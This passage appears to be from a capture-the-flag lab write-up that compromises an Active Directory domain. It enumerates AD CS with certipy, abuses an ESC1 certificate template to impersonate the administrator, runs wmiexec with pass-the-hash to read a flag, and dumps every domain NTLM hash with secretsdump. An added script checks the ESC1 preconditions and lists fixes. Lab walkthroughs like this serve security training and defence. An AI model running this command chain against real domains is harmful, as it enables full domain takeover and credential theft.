LDAP        10.6.6.55       389    DC               Resolved collection methods: container, localadmin, acl, group, psremote, objectprops, dcom, rdp, trusts, session
[19:52:14] ERROR    Unhandled exception in computer DC.cyberstrikelab.com processing: The NETBIOS connection with the remote host timed out.                      computers.py:270
LDAP        10.6.6.55       389    DC               Done in 00M 58S
LDAP        10.6.6.55       389    DC               Compressing output into /Users/a/.nxc/logs/DC_10.6.6.55_2025-05-22_195130_bloodhound.zip

Nothing special in the BloodHound data.

certipy

During the earlier fscan run I noticed that the domain runs AD CS, so enumerate the CA and templates with certipy.

❯ certipy find -vuln  -u cslab -hashes :39b0e84f13872f51efb3b8ba5018c517  -dc-ip 10.6.6.55 -ns 10.6.6.55 -dns-tcp -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Authenticating to LDAP server
[+] Bound to ldaps://10.6.6.55:636 - ssl
[+] Default path: DC=cyberstrikelab,DC=com
[+] Configuration path: CN=Configuration,DC=cyberstrikelab,DC=com
[+] Adding Domain Computers to list of current user's SIDs
[+] List of current user's SIDs:
CYBERSTRIKELAB.COM\Domain Computers (S-1-5-21-4286488488-1212600890-1604239976-515)
CYBERSTRIKELAB.COM\Everyone (CYBERSTRIKELAB.COM-S-1-1-0)
CYBERSTRIKELAB.COM\Users (CYBERSTRIKELAB.COM-S-1-5-32-545)
CYBERSTRIKELAB.COM\Authenticated Users (CYBERSTRIKELAB.COM-S-1-5-11)
CYBERSTRIKELAB.COM\Domain Users (S-1-5-21-4286488488-1212600890-1604239976-513)
CYBERSTRIKELAB.COM\cslab (S-1-5-21-4286488488-1212600890-1604239976-1104)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[+] Trying to resolve 'DC.cyberstrikelab.com' at '10.6.6.55'
[*] Trying to get CA configuration for 'cyberstrikelab-DC-CA' via CSRA
[+] Trying to get DCOM connection for: 10.6.6.55
[!] Got error while trying to get CA configuration for 'cyberstrikelab-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'cyberstrikelab-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[+] Connected to remote registry at 'DC.cyberstrikelab.com' (10.6.6.55)
[*] Got CA configuration for 'cyberstrikelab-DC-CA'
[+] Resolved 'DC.cyberstrikelab.com' from cache: 10.6.6.55
[+] Connecting to 10.6.6.55:80
[*] Saved BloodHound data to '20250522202934_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20250522202934_Certipy.txt'
[*] Saved JSON output to '20250522202934_Certipy.json'

ESC1

cat 20250522202934_Certipy.txt
Certificate Authorities
  0
    CA Name                             : cyberstrikelab-DC-CA
    DNS Name                            : DC.cyberstrikelab.com
    Certificate Subject                 : CN=cyberstrikelab-DC-CA, DC=cyberstrikelab, DC=com
    Certificate Serial Number           : 652A47597C7F03824B7815EBE474E40B
    Certificate Validity Start          : 2025-04-22 07:45:38+00:00
    Certificate Validity End            : 2030-04-22 07:55:38+00:00
    Web Enrollment                      : Enabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : CYBERSTRIKELAB.COM\Administrators
      Access Rights
        ManageCertificates              : CYBERSTRIKELAB.COM\Administrators
                                          CYBERSTRIKELAB.COM\Domain Admins
                                          CYBERSTRIKELAB.COM\Enterprise Admins
        ManageCa                        : CYBERSTRIKELAB.COM\Administrators
                                          CYBERSTRIKELAB.COM\Domain Admins
                                          CYBERSTRIKELAB.COM\Enterprise Admins
        Enroll                          : CYBERSTRIKELAB.COM\Authenticated Users
    [!] Vulnerabilities
      ESC8                              : Web Enrollment is enabled and Request Disposition is set to Issue
Certificate Templates
  0
    Template Name                       : DC
    Display Name                        : DC
    Certificate Authorities             : cyberstrikelab-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CYBERSTRIKELAB.COM\Domain Users
                                          CYBERSTRIKELAB.COM\Domain Admins
                                          CYBERSTRIKELAB.COM\Domain Computers
                                          CYBERSTRIKELAB.COM\Enterprise Admins
                                          CYBERSTRIKELAB.COM\Authenticated Users
      Object Control Permissions
        Owner                           : CYBERSTRIKELAB.COM\Administrator
        Write Owner Principals          : CYBERSTRIKELAB.COM\Domain Admins
                                          CYBERSTRIKELAB.COM\Enterprise Admins
                                          CYBERSTRIKELAB.COM\Administrator
        Write Dacl Principals           : CYBERSTRIKELAB.COM\Domain Admins
                                          CYBERSTRIKELAB.COM\Enterprise Admins
                                          CYBERSTRIKELAB.COM\Administrator
        Write Property Principals       : CYBERSTRIKELAB.COM\Domain Admins
                                          CYBERSTRIKELAB.COM\Enterprise Admins
                                          CYBERSTRIKELAB.COM\Administrator
    [!] Vulnerabilities
      ESC1                              : 'CYBERSTRIKELAB.COM\\Domain Users', 'CYBERSTRIKELAB.COM\\Domain Computers' and 'CYBERSTRIKELAB.COM\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
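Certipy prints the ESC1 verdict for the DC template in one line. The script below is an added example, not part of the original write-up and not Certipy's own code: it re-derives that verdict from the individual template properties so each precondition is explicit, and shows which single change (manager approval, dropping EnrolleeSuppliesSubject, or removing the low-privileged Enroll ACE) would close it. The dict keys mirror the labels in the text output above; they are this example's own naming, not Certipy's JSON schema.

```python
"""Check a certificate template for the ESC1 preconditions. Added example;
field names mirror Certipy's text labels and are this example's assumption."""

# Groups that mean "any low-privileged domain principal can enroll".
LOW_PRIV = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone", "Users"}

# Values copied from the certipy find output for template "DC" (domain prefix kept).
DC_TEMPLATE = {
    "Template Name": "DC",
    "Enabled": True,
    "Client Authentication": True,
    "Any Purpose": False,
    "Enrollee Supplies Subject": True,
    "Requires Manager Approval": False,
    "Authorized Signatures Required": 0,
    "Enrollment Rights": [
        "CYBERSTRIKELAB.COM\\Domain Users",
        "CYBERSTRIKELAB.COM\\Domain Admins",
        "CYBERSTRIKELAB.COM\\Domain Computers",
        "CYBERSTRIKELAB.COM\\Enterprise Admins",
        "CYBERSTRIKELAB.COM\\Authenticated Users",
    ],
}


def low_priv_enrollers(rights):
    """Principals in the enrollment ACL that every domain user is a member of."""
    return [p for p in rights if p.split("\\", 1)[-1] in LOW_PRIV]


def esc1_blockers(t):
    """ESC1 preconditions that are NOT met; an empty list means the template is exploitable."""
    blockers = []
    if not t["Enabled"]:
        blockers.append("template is not published on any CA")
    if not t["Enrollee Supplies Subject"]:
        blockers.append("CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT not set (requester cannot pick the SAN)")
    if not (t["Client Authentication"] or t["Any Purpose"]):
        blockers.append("no EKU usable for client authentication")
    if t["Requires Manager Approval"]:
        blockers.append("manager approval required (request goes to Pending, not Issue)")
    if t["Authorized Signatures Required"] > 0:
        blockers.append("enrollment agent signature required")
    if not low_priv_enrollers(t["Enrollment Rights"]):
        blockers.append("no low-privileged principal holds Enroll")
    return blockers


def is_esc1(t):
    return not esc1_blockers(t)


def with_changes(t, changes):
    """Copy of the template with the given properties replaced (to test a fix)."""
    return {**t, **changes}


if __name__ == "__main__":
    print("DC template ESC1:", is_esc1(DC_TEMPLATE))
    for fix in ({"Requires Manager Approval": True},
                {"Enrollee Supplies Subject": False},
                {"Enrollment Rights": ["CYBERSTRIKELAB.COM\\Domain Admins"]}):
        print(fix, "->", esc1_blockers(with_changes(DC_TEMPLATE, fix)))
```

Any one of the three fixes is enough to break the chain; in practice the first two are what you would ask the AD CS owner for, since a template that lets requesters write their own SAN has no legitimate use for ordinary domain users.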

ESC1, so go straight for it: the DC template lets any Domain User enroll, supply the subject/SAN themselves and use the certificate for client authentication with no manager approval, so cslab can request a certificate for `administrator` and exchange it for a TGT and the NT hash. Two things to note in the commands below: the first `-domain cyberstrike.com` in the `certipy auth` line is a typo that the later `-domain CYBERSTRIKELAB.COM` overrides (see the "Using principal" line), and Certipy reports that the certificate carries no object SID. With KB5014754 strong certificate mapping in full enforcement the DC would reject that UPN-only mapping; this lab's DC still accepts it.

❯ certipy  req -u cslab -hashes :39b0e84f13872f51efb3b8ba5018c517  -dc-ip 10.6.6.55 -ns 10.6.6.55 -dns-tcp -template DC  -ca cyberstrikelab-DC-CA -debug -upn administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.6.6.55[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.6.6.55[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 10
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
❯ certipy auth -pfx administrator.pfx -domain cyberstrike.com -dc-ip 10.6.6.55 -ns 10.6.6.55 -debug -username administrator -domain CYBERSTRIKELAB.COM
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@cyberstrikelab.com
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@cyberstrikelab.com': aad3b435b51404eeaad3b435b51404ee:28cfbc91020438f2a064a63fff9871fa

flag3

❯ wmiexec.py cyberstrike.com/administrator@10.6.6.55  -hashes :28cfbc91020438f2a064a63fff9871fa
/opt/homebrew/bin/wmiexec.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__('pkg_resources').run_script('impacket==0.11.0', 'wmiexec.py')
Impacket v0.11.0 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type c:/flag.txt
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
The syntax of the command is incorrect.
C:\>dir c:/
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
Invalid switch - "".
C:\>dir c:\
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
 Volume in drive C has no label.
 Volume Serial Number is 2C36-C1B6

 Directory of c:\

2025/04/22  16:37                45 flag.txt
2025/04/22  15:53    <DIR>          inetpub
2025/04/22  15:43    <DIR>          PerfLogs
2018/02/03  03:38    <DIR>          Program Files
2016/07/16  21:23    <DIR>          Program Files (x86)
2025/04/22  15:54    <DIR>          Users
2025/05/22  20:39    <DIR>          Windows
               1 File(s)             45 bytes
               6 Dir(s)  26,064,306,176 bytes free
C:\>type c:\flag.txt
go-flag{1DDE774EFA}
C:\>

The garbled bytes are the Chinese console's code page 936 output; running wmiexec.py with `-codec gbk` renders them. The first two commands failed for an unrelated reason: cmd's `type` and `dir` treat a forward-slash path as a switch, so `c:/flag.txt` has to be written `c:\flag.txt`.

hashdump

❯ secretsdump.py cyberstrike.com/administrator@10.6.6.55  -just-dc-ntlm  -dc-ip 10.6.6.55  -hashes :28cfbc91020438f2a064a63fff9871fa
/opt/homebrew/bin/secretsdump.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__('pkg_resources').run_script('impacket==0.11.0', 'secretsdump.py')
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:28cfbc91020438f2a064a63fff9871fa:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:416f4ea64c9c73ad29a4a69dcee5d8ca:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
cyberstrikelab.com\cslab:1104:aad3b435b51404eeaad3b435b51404ee:39b0e84f13872f51efb3b8ba5018c517:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:313b2b933939ece9a1f4ed13b58fd145:::
CYBERWEB$:1103:aad3b435b51404eeaad3b435b51404ee:331dcbb88d1a4847c97eab7c1c168ac8:::
[*] Cleaning up...
